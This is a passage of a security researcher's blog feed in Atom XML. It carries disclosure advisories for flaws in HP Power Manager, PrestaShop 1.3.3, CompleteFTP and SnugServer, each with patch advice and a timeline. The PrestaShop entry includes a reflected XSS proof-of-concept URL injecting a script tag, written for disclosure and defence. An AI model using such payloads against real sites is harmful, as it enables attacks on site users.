&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;/span&gt;&lt;a href="http://secunia.com/advisories/43058/" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://secunia.com/advisories/43058/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
2011-01-25 - CSRF Vulnerability discovered.&lt;br /&gt;
2011-01-25 - CSRF Vulnerability reported to Secunia.&lt;br /&gt;
2011-01-26 - Secunia confirmed the vulnerability and contacted the vendor.&lt;br /&gt;
2011-02-07 - HP released recommendation for CSRF.&lt;br /&gt;
2011-02-08 - Advisory published by Secunia.&lt;br /&gt;
2011-02-10 - XSS Vulnerability discovered.&lt;br /&gt;
2011-02-10 - XSS Vulnerability reported to Secunia.&lt;br /&gt;
2011-02-10 - Secunia confirmed the vulnerability and contacted the vendor.&lt;br /&gt;
2011-03-09 -&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;HP released recommendation for XSS.&lt;/span&gt;&amp;nbsp;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;
2011-03-10 - Advisory updated by Secunia.&lt;/span&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/kBx3vZAosiI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/7472560540875869371/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/hp-power-manager-cross-site-request.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/7472560540875869371?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/7472560540875869371?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/kBx3vZAosiI/hp-power-manager-cross-site-request.html" title="HP Power Manager 4.3.2 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/hp-power-manager-cross-site-request.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUMMRXc8fip7ImA9WhVWGEU.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-7368242984022899396</id><published>2012-04-19T11:48:00.001+08:00</published><updated>2012-05-01T23:51:24.976+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-01T23:51:24.976+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><title>PrestaShop 1.3.3 Cross-Site Scripting (XSS) Vulnerability</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;PrestaShop is an e-commerce solution which is free and open source. It supports payment gateways such as Google Checkout, Authorize.net, Skrill, PayPal and Payments Pro via API. Further payment modules are offered commercially.&lt;br /&gt;
&lt;br /&gt;
Sow Ching Shiong, an independent vulnerability researcher has identified a Cross-Site Scripting vulnerability in PrestaShop. This issue was discovered in a default installation of PrestaShop 1.3.3. Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;
http://[target]/[path]/search.php?'"--&amp;gt;&amp;lt;/style&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://3.bp.blogspot.com/-fFIPIBr80Ps/T4-I-VZCZgI/AAAAAAAAAD0/MK1kk6tBNQ0/s1600/xss-prestashop_v1.3.3.0.JPG"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-fFIPIBr80Ps/T4-I-VZCZgI/AAAAAAAAAD0/MK1kk6tBNQ0/s320/xss-prestashop_v1.3.3.0.JPG" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
Update to version 1.3.4 or later.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.prestashop.com/en/developers-versions/changelog/1.3.4.0" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://www.prestashop.com/en/developers-versions/changelog/1.3.4.0&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;/span&gt;&lt;a href="http://secunia.com/advisories/42503/" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://secunia.com/advisories/42503/&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
2010-12-06 - Vulnerability discovered.&lt;br /&gt;
2010-12-06 - Vulnerability reported to Secunia.&lt;br /&gt;
2010-12-10 - Secunia confirmed the vulnerability and contacted the vendor.&lt;br /&gt;
2010-12-22 - Patch released.&lt;br /&gt;
2010-12-22 - Advisory published by Secunia.&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/NELBCB1mn-A" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/7368242984022899396/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/prestashop-cross-site-scripting.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/7368242984022899396?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/7368242984022899396?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/NELBCB1mn-A/prestashop-cross-site-scripting.html" title="PrestaShop 1.3.3 Cross-Site Scripting (XSS) Vulnerability" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-fFIPIBr80Ps/T4-I-VZCZgI/AAAAAAAAAD0/MK1kk6tBNQ0/s72-c/xss-prestashop_v1.3.3.0.JPG" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/prestashop-cross-site-scripting.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkcDRncyeyp7ImA9WhVWFkU.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-1634544345216448283</id><published>2012-04-19T11:15:00.002+08:00</published><updated>2012-04-29T16:27:57.993+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-29T16:27:57.993+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Directory Traversal" /><title>CompleteFTP Server 4.0.2 Directory Traversal Vulnerability</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
CompleteFTP Server is a high-performance Windows FTP server supporting FTP, FTPS, SFTP and SCP. It features both Windows and non-Windows users and a fully configurable virtual file-system.&lt;br /&gt;
&lt;br /&gt;
Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in CompleteFTP Server. This issue was discovered in a default installation of CompleteFTP Server 4.0.2. Other earlier versions may also be affected.&lt;br /&gt;
&lt;br /&gt;&lt;span style="color: orange;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;
&lt;span style="color: orange;"&gt;&lt;b&gt;Proof of concept&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
&lt;a href="http://4.bp.blogspot.com/-hWQFAYGWCmg/T4-Be6zFG9I/AAAAAAAAADk/AcVGobH334A/s1600/CompleteFTP-01.jpg"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-hWQFAYGWCmg/T4-Be6zFG9I/AAAAAAAAADk/AcVGobH334A/s320/CompleteFTP-01.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://2.bp.blogspot.com/-CbkNkdYvcZw/T4-BiPYSQCI/AAAAAAAAADs/gvi1zkhOhP4/s1600/CompleteFTP-02.jpg"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-CbkNkdYvcZw/T4-BiPYSQCI/AAAAAAAAADs/gvi1zkhOhP4/s320/CompleteFTP-02.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
Update to version 4.0.3 or later.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.enterprisedt.com/products/completeftp/history.html" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://www.enterprisedt.com/products/completeftp/history.html&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;/span&gt;&lt;a href="http://secunia.com/advisories/39852/" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://secunia.com/advisories/39852/&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
2010-05-18 - Vulnerability discovered.&lt;br /&gt;
2010-05-18 - Vulnerability reported to Secunia.&lt;br /&gt;
2010-05-19 - Secunia confirmed the vulnerability and contacted the vendor.&lt;br /&gt;
2010-06-02 - Patch released.&lt;br /&gt;
2010-06-02 - Advisory published by Secunia.&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/aU8MGM_1XBs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/1634544345216448283/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/completeftp-server-402-directory.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/1634544345216448283?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/1634544345216448283?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/aU8MGM_1XBs/completeftp-server-402-directory.html" title="CompleteFTP Server 4.0.2 Directory Traversal Vulnerability" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-hWQFAYGWCmg/T4-Be6zFG9I/AAAAAAAAADk/AcVGobH334A/s72-c/CompleteFTP-01.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/completeftp-server-402-directory.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkcNQX0-eip7ImA9WhVWFkU.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-1621083010503652460</id><published>2012-04-18T17:20:00.006+08:00</published><updated>2012-04-29T16:28:10.352+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-29T16:28:10.352+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Directory Traversal" /><title>SnugServer FTP Server 4.3.0.126 Directory Traversal Vulnerability</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
SnugServer is an Email Server, Web Server, FTP Server, NewsServer and ListServer. It's your all-in-one solution to managing your Internet Presence. Send/receive emails through your own server, host your own website(s) and so much more.&lt;br /&gt;
&lt;br /&gt;
Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in SnugServer FTP Server. This issue was discovered in a default installation of SnugServer FTP Server 4.3.0.126. Other earlier versions may also be affected.&lt;br /&gt;
&lt;span style="color: orange;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
&lt;span style="color: orange;"&gt;&lt;b&gt;Proof of concept&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
&lt;a href="http://3.bp.blogspot.com/-ZsGOY0_uoSE/T46D9D7x83I/AAAAAAAAADc/HhTsQAysiYY/s1600/PoC.jpg"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-ZsGOY0_uoSE/T46D9D7x83I/AAAAAAAAADc/HhTsQAysiYY/s400/PoC.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
Update to version 4.3.0.134 or later.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;Reference&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
Secunia:&amp;nbsp;&lt;a href="http://secunia.com/advisories/39866/" target="_blank"&gt;http://secunia.com/advisories/39866/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
2010-05-20 - Vulnerability discovered.&lt;br /&gt;
2010-05-20 - Vulnerability reported to Secunia.&lt;br /&gt;
2010-05-20 - Secunia confirmed the vulnerability and contacted the vendor.&lt;br /&gt;
2010-05-21 - Patch released.&lt;br /&gt;
2010-05-21 - Advisory published by Secunia.&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/bN8zph7BGkc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/1621083010503652460/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/snugserver-ftp-server-430126-directory.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/1621083010503652460?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/1621083010503652460?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/bN8zph7BGkc/snugserver-ftp-server-430126-directory.html" title="SnugServer FTP Server 4.3.0.126 Directory Traversal Vulnerability" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-ZsGOY0_uoSE/T46D9D7x83I/AAAAAAAAADc/HhTsQAysiYY/s72-c/PoC.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/snugserver-ftp-server-430126-directory.html</feedburner:origLink></entry></feed>
